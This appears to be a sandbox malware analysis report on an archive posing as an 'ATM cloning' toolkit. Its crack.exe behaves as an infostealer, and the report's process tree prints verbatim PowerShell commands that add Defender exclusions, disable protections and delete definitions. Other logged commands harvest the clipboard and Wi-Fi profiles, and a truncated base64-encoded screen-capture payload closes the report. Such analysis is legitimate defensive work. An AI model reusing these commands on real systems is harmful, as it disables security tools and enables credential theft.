51d11e5deb2407945ef5e75ada802ad960ca172c1006aef6336c3c305cc0d8ec

Analysis

max time kernel
136s
max time network
139s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
24-12-2024 14:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ATM CLONING @Accorto_xD.zip
Size

54.1MB
MD5

96ad5e5c30b20897055d47a30362885c
SHA1

772bd9ff34f8e6d6d93d05c5d8a61e6bfd563f42
SHA256

51d11e5deb2407945ef5e75ada802ad960ca172c1006aef6336c3c305cc0d8ec
SHA512

aea489d51e389d67432dee8bb548c69b77466c922d8752175dd27b2779bc3a970ac6bbb7f9b40afd2680e99827be4fc690af7d6a6c3a843d4610e4c9d56de457
SSDEEP

1572864:nRQfiJNYvLFHXbF2UgekPKtduzf+KZLld5/a/:aiJNuBXbFVg/PjLLldla/

Score

8^/10

collection credential_access defense_evasion discovery execution spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4940	powershell.exe
4128	powershell.exe
1688	powershell.exe
3816	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	bp-ccalc.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
3320	cmd.exe
2516	powershell.exe

Executes dropped EXE 10 IoCs

pid	Process
392	atr tool.exe
4364	jcopmgr.exe
3528	jcopenglish.exe
1660	pyApduTool.exe
1156	pyApduTool.exe
4864	bp-tools.exe
4764	bp-ccalc.exe
4848	bp-hcmd.exe
3732	crack.exe
4116	crack.exe

Loads dropped DLL 64 IoCs

pid	Process
1156	pyApduTool.exe
1156	pyApduTool.exe
1156	pyApduTool.exe
1156	pyApduTool.exe
1156	pyApduTool.exe
1156	pyApduTool.exe
1156	pyApduTool.exe
1156	pyApduTool.exe
1156	pyApduTool.exe
1156	pyApduTool.exe
1156	pyApduTool.exe
1156	pyApduTool.exe
1156	pyApduTool.exe
1156	pyApduTool.exe
1156	pyApduTool.exe
1156	pyApduTool.exe
1156	pyApduTool.exe
1156	pyApduTool.exe
1156	pyApduTool.exe
1156	pyApduTool.exe
1156	pyApduTool.exe
1156	pyApduTool.exe
1156	pyApduTool.exe
1156	pyApduTool.exe
1156	pyApduTool.exe
1156	pyApduTool.exe
1156	pyApduTool.exe
1156	pyApduTool.exe
1156	pyApduTool.exe
1156	pyApduTool.exe
1156	pyApduTool.exe
1156	pyApduTool.exe
1156	pyApduTool.exe
1156	pyApduTool.exe
1156	pyApduTool.exe
1156	pyApduTool.exe
1156	pyApduTool.exe
4864	bp-tools.exe
4864	bp-tools.exe
4864	bp-tools.exe
4864	bp-tools.exe
4864	bp-tools.exe
4864	bp-tools.exe
4864	bp-tools.exe
4764	bp-ccalc.exe
4764	bp-ccalc.exe
4764	bp-ccalc.exe
4764	bp-ccalc.exe
4764	bp-ccalc.exe
4764	bp-ccalc.exe
4764	bp-ccalc.exe
4764	bp-ccalc.exe
4764	bp-ccalc.exe
4764	bp-ccalc.exe
4764	bp-ccalc.exe
4764	bp-ccalc.exe
4764	bp-ccalc.exe
4764	bp-ccalc.exe
4764	bp-ccalc.exe
4764	bp-ccalc.exe
4764	bp-ccalc.exe
4764	bp-ccalc.exe
4764	bp-ccalc.exe
4764	bp-ccalc.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 3 IoCs

discovery

Process Discovery

T1057

pid	Process
5064	tasklist.exe
3888	tasklist.exe
396	tasklist.exe

UPX packed file 24 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0007000000023ced-118.dat	upx
behavioral2/memory/4364-119-0x0000000000400000-0x000000000052C000-memory.dmp	upx
behavioral2/memory/4364-121-0x0000000000400000-0x000000000052C000-memory.dmp	upx
behavioral2/memory/4116-979-0x00007FFFDFDC0000-0x00007FFFE0498000-memory.dmp	upx
behavioral2/memory/4116-980-0x00007FFFF8520000-0x00007FFFF8545000-memory.dmp	upx
behavioral2/memory/4116-981-0x00007FFFF8440000-0x00007FFFF844F000-memory.dmp	upx
behavioral2/memory/4116-986-0x00007FFFF8100000-0x00007FFFF812D000-memory.dmp	upx
behavioral2/memory/4116-987-0x00007FFFF6B50000-0x00007FFFF6B69000-memory.dmp	upx
behavioral2/memory/4116-988-0x00007FFFF4300000-0x00007FFFF4324000-memory.dmp	upx
behavioral2/memory/4116-989-0x00007FFFF0AA0000-0x00007FFFF0C16000-memory.dmp	upx
behavioral2/memory/4116-990-0x00007FFFF5C00000-0x00007FFFF5C19000-memory.dmp	upx
behavioral2/memory/4116-991-0x00007FFFF8430000-0x00007FFFF843D000-memory.dmp	upx
behavioral2/memory/4116-992-0x00007FFFF1280000-0x00007FFFF12B3000-memory.dmp	upx
behavioral2/memory/4116-993-0x00007FFFDFDC0000-0x00007FFFE0498000-memory.dmp	upx
behavioral2/memory/4116-994-0x00007FFFF06D0000-0x00007FFFF079D000-memory.dmp	upx
behavioral2/memory/4116-997-0x00007FFFF8520000-0x00007FFFF8545000-memory.dmp	upx
behavioral2/memory/4116-996-0x00007FFFDF890000-0x00007FFFDFDB2000-memory.dmp	upx
behavioral2/memory/4116-998-0x00007FFFF59C0000-0x00007FFFF59D4000-memory.dmp	upx
behavioral2/memory/4116-999-0x00007FFFF8100000-0x00007FFFF812D000-memory.dmp	upx
behavioral2/memory/4116-1000-0x00007FFFF6B40000-0x00007FFFF6B4D000-memory.dmp	upx
behavioral2/memory/4116-1003-0x00007FFFF6B50000-0x00007FFFF6B69000-memory.dmp	upx
behavioral2/memory/4116-1004-0x00007FFFE1D70000-0x00007FFFE1E8B000-memory.dmp	upx
behavioral2/memory/4116-1075-0x00007FFFF4300000-0x00007FFFF4324000-memory.dmp	upx
behavioral2/memory/4116-1115-0x00007FFFF0AA0000-0x00007FFFF0C16000-memory.dmp	upx

Drops file in Program Files directory 40 IoCs

description	ioc	Process
File created	C:\Program Files\EFTlab\BP-Tools\bin\bp-hcmd.exe	bp-tools.exe
File created	C:\Program Files\EFTlab\BP-Tools\doc\RELEASE_NOTES.TXT	bp-tools.exe
File created	C:\Program Files\EFTlab\BP-Tools\bin\libgcc_s_seh-1.dll	bp-tools.exe
File opened for modification	C:\Program Files\EFTlab\BP-Tools\bin\bp-ccalc.exe-startup.log	bp-ccalc.exe
File opened for modification	C:\Program Files\EFTlab\BP-Tools\bin\bp-hcmd.exe-startup.log	bp-hcmd.exe
File created	C:\Program Files\EFTlab\BP-Tools\bin\libboost_regex-mt.dll	bp-tools.exe
File created	C:\Program Files\EFTlab\BP-Tools\bin\libicuin65.dll	bp-tools.exe
File created	C:\Program Files\EFTlab\BP-Tools\bin\libwinpthread-1.dll	bp-tools.exe
File created	C:\Program Files\EFTlab\BP-Tools\bin\libboost_date_time-mt.dll	bp-tools.exe
File created	C:\Program Files\EFTlab\BP-Tools\bin\libbp-shared-atm.dll	bp-tools.exe
File created	C:\Program Files\EFTlab\BP-Tools\bin\libbp-shared-wx.dll	bp-tools.exe
File created	C:\Program Files\EFTlab\BP-Tools\bin\zlib1.dll	bp-tools.exe
File created	C:\Program Files\EFTlab\BP-Tools\bin\libboost_program_options-mt.dll	bp-tools.exe
File created	C:\Program Files\EFTlab\BP-Tools\bin\libgcrypt-20.dll	bp-tools.exe
File created	C:\Program Files\EFTlab\BP-Tools\bin\libiconv-2.dll	bp-tools.exe
File created	C:\Program Files\EFTlab\BP-Tools\bin\wxbase310u_gcc_custom.dll	bp-tools.exe
File created	C:\Program Files\EFTlab\BP-Tools\bin\wxmsw310u_adv_gcc_custom.dll	bp-tools.exe
File created	C:\Program Files\EFTlab\BP-Tools\bin\wxmsw310u_core_gcc_custom.dll	bp-tools.exe
File created	C:\Program Files\EFTlab\BP-Tools\bin\bp-ccalc.exe	bp-tools.exe
File created	C:\Program Files\EFTlab\BP-Tools\bin\libboost_log-mt.dll	bp-tools.exe
File created	C:\Program Files\EFTlab\BP-Tools\bin\libboost_log_setup-mt.dll	bp-tools.exe
File created	C:\Program Files\EFTlab\BP-Tools\bin\libgpg-error-0.dll	bp-tools.exe
File created	C:\Program Files\EFTlab\BP-Tools\bin\libjsoncpp.dll	bp-tools.exe
File created	C:\Program Files\EFTlab\BP-Tools\bin\libssl-1_1-x64.dll	bp-tools.exe
File created	C:\Program Files\EFTlab\BP-Tools\bin\libxml2-2.dll	bp-tools.exe
File created	C:\Program Files\EFTlab\BP-Tools\bin\libzstd.dll	bp-tools.exe
File created	C:\Program Files\EFTlab\BP-Tools\bin\libboost_chrono-mt.dll	bp-tools.exe
File created	C:\Program Files\EFTlab\BP-Tools\bin\libboost_filesystem-mt.dll	bp-tools.exe
File created	C:\Program Files\EFTlab\BP-Tools\bin\libboost_thread-mt.dll	bp-tools.exe
File created	C:\Program Files\EFTlab\BP-Tools\bin\libicudt65.dll	bp-tools.exe
File created	C:\Program Files\EFTlab\BP-Tools\bin\libjpeg-8.dll	bp-tools.exe
File created	C:\Program Files\EFTlab\BP-Tools\bin\libsqlite3-0.dll	bp-tools.exe
File created	C:\Program Files\EFTlab\BP-Tools\bin\libbp-shared.dll	bp-tools.exe
File created	C:\Program Files\EFTlab\BP-Tools\bin\libcrypto-1_1-x64.dll	bp-tools.exe
File created	C:\Program Files\EFTlab\BP-Tools\bin\libicuuc65.dll	bp-tools.exe
File created	C:\Program Files\EFTlab\BP-Tools\bin\libpng16-16.dll	bp-tools.exe
File created	C:\Program Files\EFTlab\BP-Tools\bin\libtiff-5.dll	bp-tools.exe
File created	C:\Program Files\EFTlab\BP-Tools\bin\liblzma-5.dll	bp-tools.exe
File created	C:\Program Files\EFTlab\BP-Tools\bin\libstdc++-6.dll	bp-tools.exe
File created	C:\Program Files\EFTlab\BP-Tools\Uninstall.exe	bp-tools.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	jcopmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	jcopenglish.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	pyApduTool.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	pyApduTool.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
4400	cmd.exe
4268	netsh.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
2496	systeminfo.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
3812	NOTEPAD.EXE

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
1688	powershell.exe
1688	powershell.exe
4940	powershell.exe
4128	powershell.exe
4940	powershell.exe
4940	powershell.exe
4128	powershell.exe
4128	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2588	7zFM.exe

Suspicious use of AdjustPrivilegeToken 31 IoCs

description	pid	Process
Token: SeRestorePrivilege	2588	7zFM.exe
Token: 35	2588	7zFM.exe
Token: SeSecurityPrivilege	2588	7zFM.exe
Token: SeDebugPrivilege	392	atr tool.exe
Token: SeDebugPrivilege	1688	powershell.exe
Token: SeDebugPrivilege	4940	powershell.exe
Token: SeDebugPrivilege	4128	powershell.exe
Token: SeDebugPrivilege	5064	tasklist.exe
Token: SeDebugPrivilege	3888	tasklist.exe
Token: SeIncreaseQuotaPrivilege	1516	WMIC.exe
Token: SeSecurityPrivilege	1516	WMIC.exe
Token: SeTakeOwnershipPrivilege	1516	WMIC.exe
Token: SeLoadDriverPrivilege	1516	WMIC.exe
Token: SeSystemProfilePrivilege	1516	WMIC.exe
Token: SeSystemtimePrivilege	1516	WMIC.exe
Token: SeProfSingleProcessPrivilege	1516	WMIC.exe
Token: SeIncBasePriorityPrivilege	1516	WMIC.exe
Token: SeCreatePagefilePrivilege	1516	WMIC.exe
Token: SeBackupPrivilege	1516	WMIC.exe
Token: SeRestorePrivilege	1516	WMIC.exe
Token: SeShutdownPrivilege	1516	WMIC.exe
Token: SeDebugPrivilege	1516	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1516	WMIC.exe
Token: SeRemoteShutdownPrivilege	1516	WMIC.exe
Token: SeUndockPrivilege	1516	WMIC.exe
Token: SeManageVolumePrivilege	1516	WMIC.exe
Token: 33	1516	WMIC.exe
Token: 34	1516	WMIC.exe
Token: 35	1516	WMIC.exe
Token: 36	1516	WMIC.exe
Token: SeDebugPrivilege	396	tasklist.exe

Suspicious use of FindShellTrayWindow 4 IoCs

pid	Process
2588	7zFM.exe
2588	7zFM.exe
3528	jcopenglish.exe
4848	bp-hcmd.exe

Suspicious use of SetWindowsHookEx 10 IoCs

pid	Process
3528	jcopenglish.exe
1156	pyApduTool.exe
1156	pyApduTool.exe
4864	bp-tools.exe
4764	bp-ccalc.exe
4764	bp-ccalc.exe
4764	bp-ccalc.exe
4848	bp-hcmd.exe
4848	bp-hcmd.exe
4848	bp-hcmd.exe

Suspicious use of WriteProcessMemory 45 IoCs

description	pid	Process	procid_target
PID 1660 wrote to memory of 1156	1660	pyApduTool.exe	99
PID 1660 wrote to memory of 1156	1660	pyApduTool.exe	99
PID 1660 wrote to memory of 1156	1660	pyApduTool.exe	99
PID 3732 wrote to memory of 4116	3732	crack.exe	108
PID 3732 wrote to memory of 4116	3732	crack.exe	108
PID 4116 wrote to memory of 4396	4116	crack.exe	109
PID 4116 wrote to memory of 4396	4116	crack.exe	109
PID 4116 wrote to memory of 4404	4116	crack.exe	110
PID 4116 wrote to memory of 4404	4116	crack.exe	110
PID 4116 wrote to memory of 4344	4116	crack.exe	113
PID 4116 wrote to memory of 4344	4116	crack.exe	113
PID 4404 wrote to memory of 1688	4404	cmd.exe	115
PID 4404 wrote to memory of 1688	4404	cmd.exe	115
PID 4396 wrote to memory of 4940	4396	cmd.exe	116
PID 4396 wrote to memory of 4940	4396	cmd.exe	116
PID 4344 wrote to memory of 4128	4344	cmd.exe	117
PID 4344 wrote to memory of 4128	4344	cmd.exe	117
PID 4116 wrote to memory of 4432	4116	crack.exe	118
PID 4116 wrote to memory of 4432	4116	crack.exe	118
PID 4116 wrote to memory of 3308	4116	crack.exe	119
PID 4116 wrote to memory of 3308	4116	crack.exe	119
PID 4116 wrote to memory of 1744	4116	crack.exe	122
PID 4116 wrote to memory of 1744	4116	crack.exe	122
PID 4116 wrote to memory of 3320	4116	crack.exe	123
PID 4116 wrote to memory of 3320	4116	crack.exe	123
PID 3308 wrote to memory of 5064	3308	cmd.exe	124
PID 3308 wrote to memory of 5064	3308	cmd.exe	124
PID 4116 wrote to memory of 4692	4116	crack.exe	125
PID 4116 wrote to memory of 4692	4116	crack.exe	125
PID 4116 wrote to memory of 2476	4116	crack.exe	129
PID 4116 wrote to memory of 2476	4116	crack.exe	129
PID 4432 wrote to memory of 3888	4432	cmd.exe	130
PID 4432 wrote to memory of 3888	4432	cmd.exe	130
PID 4116 wrote to memory of 4400	4116	crack.exe	132
PID 4116 wrote to memory of 4400	4116	crack.exe	132
PID 4116 wrote to memory of 2368	4116	crack.exe	133
PID 4116 wrote to memory of 2368	4116	crack.exe	133
PID 4116 wrote to memory of 1132	4116	crack.exe	135
PID 4116 wrote to memory of 1132	4116	crack.exe	135
PID 1744 wrote to memory of 1516	1744	cmd.exe	138
PID 1744 wrote to memory of 1516	1744	cmd.exe	138
PID 3320 wrote to memory of 2516	3320	cmd.exe	139
PID 3320 wrote to memory of 2516	3320	cmd.exe	139
PID 4692 wrote to memory of 396	4692	cmd.exe	141
PID 4692 wrote to memory of 396	4692	cmd.exe	141

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\ATM CLONING @Accorto_xD.zip"
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2588

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\Password.txt
1⤵
- Opens file in notepad (likely ransom note)
PID:3812

C:\Users\Admin\Desktop\atr tool.exe
"C:\Users\Admin\Desktop\atr tool.exe"
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:392

C:\Users\Admin\Desktop\jcopmgr.exe
"C:\Users\Admin\Desktop\jcopmgr.exe"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4364

C:\Users\Admin\Desktop\jcopenglish.exe
"C:\Users\Admin\Desktop\jcopenglish.exe"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:3528

C:\Users\Admin\Desktop\pyApduTool.exe
"C:\Users\Admin\Desktop\pyApduTool.exe"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1660
- C:\Users\Admin\Desktop\pyApduTool.exe
  "C:\Users\Admin\Desktop\pyApduTool.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:1156

C:\Users\Admin\Desktop\bp-tools.exe
"C:\Users\Admin\Desktop\bp-tools.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:4864

C:\Program Files\EFTlab\BP-Tools\bin\bp-ccalc.exe
"C:\Program Files\EFTlab\BP-Tools\bin\bp-ccalc.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:4764

C:\Program Files\EFTlab\BP-Tools\bin\bp-hcmd.exe
"C:\Program Files\EFTlab\BP-Tools\bin\bp-hcmd.exe"
1⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:4848

C:\Users\Admin\Desktop\crack.exe
"C:\Users\Admin\Desktop\crack.exe"
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3732
- C:\Users\Admin\Desktop\crack.exe
  "C:\Users\Admin\Desktop\crack.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4116
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\crack.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4396
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\crack.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4940
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4404
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1688
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‏ .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4344
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‏ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4128
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4432
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3888
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3308
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:5064
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1744
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1516
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:3320
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      PID:2516
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4692
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:396
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2476
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3688
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:4400
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:4268
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:2368
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:2496
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHk